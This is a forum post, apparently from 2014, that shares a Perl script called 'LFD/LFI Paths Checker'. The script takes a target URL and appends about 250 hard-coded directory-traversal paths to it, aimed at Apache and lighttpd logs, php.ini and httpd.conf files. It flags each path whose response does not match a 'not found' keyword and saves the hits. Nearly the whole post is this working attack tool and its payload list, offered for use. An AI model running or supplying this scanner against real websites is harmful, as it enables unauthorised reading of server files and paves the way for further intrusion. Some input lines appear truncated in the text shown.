sQuo Posted March 5, 2014 Share Posted March 5, 2014 LFD/LFI Paths Checker [LENGUAJE=perl]#!/usr/bin/perl # m-a_labz use HTTP::Request; use LWP::Simple; use Term::ANSIColor; use Win32::Console::ANSI; $|=1; print color("bold black"), "\n\t[+] LFD/LFI Paths Checker\n"; a: print color("bold red"), "\n[+] Enter Url : "; print color 'reset'; $ex=; chomp($ex); if ($ex =~ /exit/ ||$ex =~ /quit/) { exit; } # keyword if false print color("bold red"), "[+] Enter KeyWord : "; print color 'reset'; $keyword=; chomp($keyword); print color("bold red"), "[+] Enter Paths File : "; print color 'reset'; $pathsf=; chomp($pathsf); print color("bold red"), "[+] Should I Save Results ? : "; print color 'reset'; $save=; chomp($save); if ($ex =~ /http/){ $exp = $ex; }else{ $exp = "http://".$ex; } if ($pathsf =~ /.txt/) { open (tt, " my @tt = ; close tt; } elsif ($pathsf =~ /inside/) { @tt = ( '/usr/local/apache/logs/audit_log', '/logs/security_debug_log', '/logs/security_log', '/var/log/lighttpd.error.log', '/var/log/lighttpd.access.log', '/var/lighttpd.log', '/var/logs/access.log', '/var/log/lighttpd/', '/var/log/lighttpd/error.log', '/var/log/lighttpd/access.http://www.log', '/var/log/lighttpd/error.http://www.log', '/var/log/lighttpd/access.log', '/usr/local/apache2/logs/lighttpd.error.log', '/usr/local/apache2/logs/lighttpd.log', '/usr/local/apache/logs/lighttpd.error.log', '/usr/local/apache/logs/lighttpd.log', '/var/log/lighttpd.access.log', '/var/log/lighttpd.error.log', '/usr/local/lighttpd/log/lighttpd.error.log', '/usr/local/lighttpd/log/access.log', '../../../../../../../../../etc/php.ini', '../../../../../../../../../bin/php.ini', '../../../../../../../../../etc/httpd/php.ini', '../../../../../../../../../usr/lib/php.ini', '../../../../../../../../../usr/lib/php/php.ini', '../../../../../../../../../usr/local/etc/php.ini', '../../../../../../../../../usr/local/lib/php.ini', '../../../../../../../../../usr/local/php/lib/php.ini', '../../../../../../../../../usr/local/php4/lib/php.ini', '../../../../../../../../../usr/local/php5/lib/php.ini', '../../../../../../../../../usr/local/apache/conf/php.ini', '../../../../../../../../../etc/php4.4/fcgi/php.ini', '../../../../../../../../../etc/php4/apache/php.ini', '../../../../../../../../../etc/php4/apache2/php.ini', '../../../../../../../../../etc/php5/apache/php.ini', '../../../../../../../../../etc/php5/apache2/php.ini', '../../../../../../../../../etc/php/php.ini', '../../../../../../../../../etc/php/php4/php.ini', '../../../../../../../../../etc/php/apache/php.ini', '../../../../../../../../../etc/php/apache2/php.ini', '../../../../../../../../../web/conf/php.ini', '../../../../../../../../../usr/local/Zend/etc/php.ini', '../../../../../../../../../opt/xampp/etc/php.ini', '../../../../../../../../../var/local/www/conf/php.ini', '../../../../../../../../../etc/php/cgi/php.ini', '../../../../../../../../../etc/php4/cgi/php.ini', '../../../../../../../../../etc/php5/cgi/php.ini', '../../../../../../../../../php5\php.ini', '../../../../../../../../../php4\php.ini', '../../../../../../../../../php\php.ini', '../../../../../../../../../PHP\php.ini', '../../../../../../../../../WINDOWS\php.ini', '../../../../../../../../../WINNT\php.ini', '../../../../../../../../../apache\php\php.ini', '../../../../../../../../../xampp\apache\bin\php.ini', '../../../../../../../../../NetServer\bin\stable\apache\php.ini', '../../../../../../../../../home2\bin\stable\apache\php.ini', '../../../../../../../../../home\bin\stable\apache\php.ini', '../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini', '../../../../../../../../../../../../var/log/httpd/access_log', '../../../../../../../../../../../../var/log/httpd/error_log', '../../../../../../../../../../var/log/httpd/access_log', '../../../../../../../../../../var/log/httpd/error_log', '../apache/logs/error.log', '../apache/logs/access.log', '../../apache/logs/error.log', '../../apache/logs/access.log', '../../../apache/logs/error.log', '../../../apache/logs/access.log', '../../../../apache/logs/error.log', '../../../../apache/logs/access.log', '../../../../../apache/logs/error.log', '../../../../../apache/logs/access.log', '../apache2/logs/error.log', '../apache2/logs/access.log', '../../apache2/logs/error.log', '../../apache2/logs/access.log', '../../../apache2/logs/error.log', '../../../apache2/logs/access.log', '../../../../apache2/logs/error.log', '../../../../apache2/logs/access.log', '../../../../../apache2/logs/error.log', '../../../../../apache2/logs/access.log', '../logs/error.log', '../logs/access.log', '../../logs/error.log', '../../logs/access.log', '../../../logs/error.log', '../../../logs/access.log', '../../../../logs/error.log', '../../../../logs/access.log', '../../../../../logs/error.log', '../../../../../logs/access.log', '../../../../../../../../../../etc/httpd/logs/acces_log', '../../../../../../../../../../etc/httpd/logs/acces.log', '../../../../../../../../../../etc/httpd/logs/error_log', '../../../../../../../../../../etc/httpd/logs/error.log', '../../../../../../../../../../usr/local/apache/logs/access_log', '../../../../../../../../../../usr/local/apache/logs/access.log', '../../../../../../../../../../usr/local/apache/logs/error_log', '../../../../../../../../../../usr/local/apache/logs/error.log', '../../../../../../../../../../usr/local/apache2/logs/access_log', '../../../../../../../../../../usr/local/apache2/logs/access.log', '../../../../../../../../../../usr/local/apache2/logs/error_log', '../../../../../../../../../../usr/local/apache2/logs/error.log', '../../../../../../../../../../var/www/logs/access_log', '../../../../../../../../../../var/www/logs/access.log', '../../../../../../../../../../var/www/logs/error_log', '../../../../../../../../../../var/www/logs/error.log', '../../../../../../../../../../var/log/httpd/access_log', '../../../../../../../../../../var/log/httpd/access.log', '../../../../../../../../../../var/log/httpd/error_log', '../../../../../../../../../../var/log/httpd/error.log', '../../../../../../../../../../var/log/apache/access_log', '../../../../../../../../../../var/log/apache/access.log', '../../../../../../../../../../var/log/apache/error_log', '../../../../../../../../../../var/log/apache/error.log', '../../../../../../../../../../var/log/apache2/access_log', '../../../../../../../../../../var/log/apache2/access.log', '../../../../../../../../../../var/log/apache2/error_log', '../../../../../../../../../../var/log/apache2/error.log', '../../../../../../../../../../var/log/access_log', '../../../../../../../../../../var/log/access.log', '../../../../../../../../../../var/log/error_log', '../../../../../../../../../../var/log/error.log', '../../../../../../../../../../opt/lampp/logs/access_log', '../../../../../../../../../../opt/lampp/logs/error_log', '../../../../../../../../../../opt/xampp/logs/access_log', '../../../../../../../../../../opt/xampp/logs/error_log', '../../../../../../../../../../opt/lampp/logs/access.log', '../../../../../../../../../../opt/lampp/logs/error.log', '../../../../../../../../../../opt/xampp/logs/access.log', '../../../../../../../../../../opt/xampp/logs/error.log', '../../../apache/logs/error.log', '../../../apache/logs/access.log', '../../../../apache/logs/error.log', '../../../../apache/logs/access.log', '../../../../../apache/logs/error.log', '../../../../../apache/logs/access.log', '../../../../../../apache/logs/error.log', '../../../../../../apache/logs/access.log', '../../../../../../../apache/logs/error.log', '../../../../../../../apache/logs/access.log', '../../../../../../../../apache/logs/error.log', '../../../../../../../../apache/logs/access.log', '../../../logs/error.log', '../../../logs/access.log', '../../../../logs/error.log', '../../../../logs/access.log', '../../../../../logs/error.log', '../../../../../logs/access.log', '../../../../../../logs/error.log', '../../../../../../logs/access.log', '../../../../../../../logs/error.log', '../../../../../../../logs/access.log', '../../../../../../../../logs/error.log', '../../../../../../../../logs/access.log', '../../../../../../../../../../../../etc/httpd/logs/acces_log', '../../../../../../../../../../../../etc/httpd/logs/acces.log', '../../../../../../../../../../../../etc/httpd/logs/error_log', '../../../../../../../../../../../../etc/httpd/logs/error.log', '../../../../../../../../../../../../var/www/logs/access_log', '../../../../../../../../../../../../var/www/logs/access.log', '../../../../../../../../../../../../usr/local/apache/logs/access_log', '../../../../../../../../../../../../usr/local/apache/logs/access.log', '../../../../../../../../../../../../var/log/apache/access_log', '../../../../../../../../../../../../var/log/apache/access.log', '../../../../../../../../../../../../var/log/access_log', '../../../../../../../../../../../../var/www/logs/error_log', '../../../../../../../../../../../../var/www/logs/error.log', '../../../../../../../../../../../../usr/local/apache/logs/error_log', '../../../../../../../../../../../../usr/local/apache/logs/error.log', '../../../../../../../../../../../../var/log/apache/error_log', '../../../../../../../../../../../../var/log/apache/error.log', '../../../../../../../../../../../../var/log/access_log', '../../../../../../../../../../../../var/log/error_log', '../../../../../../usr/local/apache/conf/httpd.conf', '../../../../../../usr/local/apache2/conf/httpd.conf', '../../../../../../etc/httpd/conf/httpd.conf', '../../../../../../etc/apache/conf/httpd.conf', '../../../../../../usr/local/etc/apache/conf/httpd.conf', '../../../../../../etc/apache2/httpd.conf', '../../../../../../../../../usr/local/apache/conf/httpd.conf', '../../../../../../../../../usr/local/apache2/conf/httpd.conf', '../../../../../../../../usr/local/apache/httpd.conf', '../../../../../../../../usr/local/apache2/httpd.conf', '../../../../../../../../usr/local/httpd/conf/httpd.conf', '../../../../../../../usr/local/etc/apache/conf/httpd.conf', '../../../../../../../usr/local/etc/apache2/conf/httpd.conf', '../../../../../../../usr/local/etc/httpd/conf/httpd.conf', '../../../../../../../usr/apache2/conf/httpd.conf', '../../../../../../../usr/apache/conf/httpd.conf', '../../../../../../../usr/local/apps/apache2/conf/httpd.conf', '../../../../../../../usr/local/apps/apache/conf/httpd.conf', '../../../../../../etc/apache/conf/httpd.conf', '../../../../../../etc/apache2/conf/httpd.conf', '../../../../../../etc/httpd/conf/httpd.conf', '../../../../../../../../../etc/php5/apache2/httpd/conf/httpd.conf', '../../../../../../etc/http/conf/httpd.conf', '../../../../../../etc/apache2/httpd.conf', '../../../../../../etc/httpd/httpd.conf', '../../../../../../etc/http/httpd.conf', '../../../../../../etc/httpd.conf', '../../../../../opt/apache/conf/httpd.conf', '../../../../../opt/apache2/conf/httpd.conf', '../../../../../../../../../etc/php5/apache2/conf/httpd.conf', '../../../../var/www/conf/httpd.conf', '../../../private/etc/httpd/httpd.conf', '../../../private/etc/httpd/httpd.conf.default', '../../Volumes/webBackup/opt/apache2/conf/httpd.conf', '../../Volumes/webBackup/private/etc/httpd/httpd.conf', '../../Volumes/webBackup/private/etc/httpd/httpd.conf.default', '../../../../../../../../../usr/local/php/httpd.conf.php', '../../../../../../../../../usr/local/php4/httpd.conf.php', '../../../../../../../../../usr/local/php5/httpd.conf.php', '../../../../../../../../../usr/local/php/httpd.conf', '../../../../../../../../../usr/local/php4/httpd.conf', '../../../../../../../../../usr/local/php5/httpd.conf', '../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf', '../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf', '../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf', '../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php', '../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php', '../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php', '/usr/local/etc/apache/vhosts.conf' ); }else{ print color("bold blue"), "\n\tZuHaHaHaHaHa My Master Is BAKA :P\n"; print color 'reset'; } foreach $path (@tt) { chomp $path; $url = $exp.$path ; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $useragent->timeout(5); $response = $useragent->request($request); if ($response->content=~m/$keyword/g) { if ($ARGV[0] =~ "-v" ){ } else { print color("bold white"), "[.] $path "; print "Not Found\n"; } } else { print color("bold red"), "[+] FOUND => "; print color("bold yellow"), "$path\n"; print color 'reset'; if ($save =~ /.txt/) { open(a, ">>$save"); print a "$path\n"; close(a); } } next; } print color 'reset'; print "\n\t\t[+] Enter 1 To Go Back To Menu : ";my $back=; chomp $back; if ($back eq "1") { system("cls"); require("../main.pl"); } goto a;[/LENGUAJE] Link to comment Share on other sites More sharing options...
Recommended Posts